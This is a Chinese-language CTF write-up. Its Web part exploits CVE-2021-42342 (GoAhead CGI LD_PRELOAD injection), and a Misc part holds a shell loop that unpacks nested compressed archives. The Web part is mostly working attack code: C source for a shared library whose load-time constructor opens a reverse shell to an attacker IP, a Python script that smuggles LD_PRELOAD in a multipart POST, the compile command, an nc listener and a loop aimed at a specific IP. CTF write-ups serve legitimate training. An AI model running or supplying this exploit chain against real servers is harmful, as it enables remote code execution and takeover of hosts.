[施工中,待后续补充]

Web

gogogo

dockerfile,查阅可知是CVE-2021-42342
参考p神文章 https://tttang.com/archive/1399/
payload.c

#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>

/* Connect-back endpoint read by reverse_shell(); as written the address is
 * only a placeholder string, the port is fixed at 7777. */
char *server_ip="xx.xx.xx.xx";
uint32_t server_port=7777;

/*
 * Runs automatically when this shared object is loaded (GCC constructor
 * attribute), so nothing in the library ever has to be called explicitly;
 * the accompanying poc.py gets the object loaded through the LD_PRELOAD
 * form field it sends.
 *
 * Behaviour as written: open a TCP connection to server_ip:server_port,
 * exit(0) quietly if the connect fails, point stdin/stdout/stderr at the
 * socket, then replace the process image with `cat /flag`. The second
 * execve (bash, with NULL argv/envp) is only reached if the cat execve
 * fails. Because of the exit(0), any connect failure terminates the host
 * process that loaded the library.
 *
 * Detection-relevant signals for defenders: an unexpected LD_PRELOAD value
 * in a server process's environment, an outbound TCP connection made at
 * library-load time, and a process whose three standard descriptors refer
 * to a socket.
 */
static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void) 
{
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in attacker_addr = {0};
  attacker_addr.sin_family = AF_INET;
  attacker_addr.sin_port = htons(server_port);
  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
    exit(0);
  /* Standard input/output/error now all go over the socket. */
  dup2(sock, 0);
  dup2(sock, 1);
  dup2(sock, 2);
  char *argv[]={"cat","/flag", NULL};
  char *envp[]={0,NULL};
  execve("/bin/cat", argv, envp);
  /* Fallback, reached only if the execve above returned (i.e. failed). */
  execve("/bin/bash", 0, 0);
}

poc.py

import sys
import socket
import ssl
import random
from urllib.parse import urlparse, ParseResult

# Upper bound on the payload file size accepted by main(); exploit() also
# caps the Content-Length it advertises at this value.
PAYLOAD_MAX_LENGTH = 16384 - 200

def exploit(client: socket.socket, parts: ParseResult, payload: bytes) -> None:
    """Send one crafted multipart POST over *client* and print the reply.

    The request carries two form fields: ``LD_PRELOAD`` set to
    ``/proc/self/fd/7`` and a file field whose content is *payload*
    followed by 2000 bytes of ``'a'`` padding. Note that ``Content-Length``
    is derived from ``len(payload) + 500`` (capped at PAYLOAD_MAX_LENGTH)
    rather than from the real body length. A single ``recv`` of up to
    20480 bytes is read back and decoded as UTF-8 (strict), so a non-UTF-8
    reply raises UnicodeDecodeError.

    Args:
        client: connected plain or TLS-wrapped socket.
        parts: parsed target URL; ``path`` and ``hostname`` are used.
        payload: raw bytes substituted for the ``#payload#`` marker.
    """
    path = '/' if not parts.path else parts.path
    boundary = '----%s' % str(random.randint(1000000000000, 9999999999999))
    padding = 'a' * 2000
    content_length = min(len(payload) + 500, PAYLOAD_MAX_LENGTH)
    # Request template; line endings are normalised to CRLF after the literal.
    data = fr'''POST {path} HTTP/1.1
Host: {parts.hostname}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary={boundary}
Content-Length: {content_length}

--{boundary}
Content-Disposition: form-data; name="LD_PRELOAD";

/proc/self/fd/7
--{boundary}
Content-Disposition: form-data; name="data"; filename="1.txt"
Content-Type: text/plain

#payload#{padding}
--{boundary}--
'''.replace('\n', '\r\n')
    # The marker is replaced at the bytes level so the binary payload is not decoded.
    data = data.encode().replace(b'#payload#', payload)
    client.send(data)
    resp = client.recv(20480)
    print(resp.decode())

def main() -> None:
    """Read a target URL and payload file from argv and send one request.

    Usage: ``poc.py <url> <payload-file>``. The payload file is rejected
    if it exceeds PAYLOAD_MAX_LENGTH. The port defaults to 443 for https
    and 80 otherwise; https targets are wrapped with
    ``ssl.create_default_context()``. No argv validation is done, so a
    missing argument raises IndexError.
    """
    target = sys.argv[1]
    payload_filename = sys.argv[2]

    with open(payload_filename, 'rb') as f:
        data = f.read()

    if len(data) > PAYLOAD_MAX_LENGTH:
        # NOTE: the '%d' is never interpolated -- the message and the limit
        # are passed as two separate exception arguments.
        raise Exception('payload size must not larger than %d', PAYLOAD_MAX_LENGTH)

    parts = urlparse(target)
    port = parts.port
    if not parts.port:
        if parts.scheme == 'https':
            port = 443
        else:
            port = 80

    context = ssl.create_default_context()
    with socket.create_connection((parts.hostname, port), timeout=8) as client:
        if parts.scheme == 'https':
            with context.wrap_socket(client, server_hostname=parts.hostname) as ssock:
                exploit(ssock, parts, data)

        else:
            exploit(client, parts, data)

if __name__ == '__main__':
    main()
gcc -s -shared -fPIC ./payload.c -o shell.so
nc -lvnp 7777
while true; do python3 poc.py http://123.60.84.229:10218/cgi-bin/hello shell.so; done;

file

Misc

signin

循环解压缩包

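# Repeatedly strip one layer of compression from $work/flag until the file
# is no longer a recognised compressed format (bzip2, XZ, LZMA, gzip,
# Zstandard), then stop.
#
# Fixes relative to the first version:
#   - the type check used the relative path ./bbb/flag while every operation
#     used the absolute path, so the loop only worked from /root/work/aaa;
#     one absolute path is now used throughout;
#   - the Zstandard branch removed "$work/flag/flag.zst" (a path under the
#     decompressed file) instead of "$work/flag.zst", so the .zst leftover
#     was never deleted;
#   - when no format matches, the loop exits instead of spinning forever.
work=/root/work/aaa/bbb
while :
do
    # `file -b` prints only the description, without the filename.
    kind=$(file -b "$work/flag")
    case "$kind" in
        *bzip2*)
            mv "$work/flag" "$work/flag.bz2"
            bunzip2 "$work/flag.bz2"
            ;;
        *XZ*)
            # 7z writes the extracted member as flag~ when the name collides
            # with the archive, so it is renamed back afterwards.
            7z x "$work/flag" -o"$work"
            rm "$work/flag"
            mv "$work/flag~" "$work/flag"
            ;;
        *LZMA*)
            mv "$work/flag" "$work/flag.lzma"
            lzma -d "$work/flag.lzma"
            ;;
        *gzip*)
            mv "$work/flag" "$work/flag.gz"
            gzip -d "$work/flag.gz"
            ;;
        *Zstandard*)
            mv "$work/flag" "$work/flag.zst"
            # zstd keeps its input by default, hence the explicit rm.
            zstd -d "$work/flag.zst"
            rm "$work/flag.zst"
            ;;
        *)
            # Not a known compressed format any more: done.
            break
            ;;
    esac
done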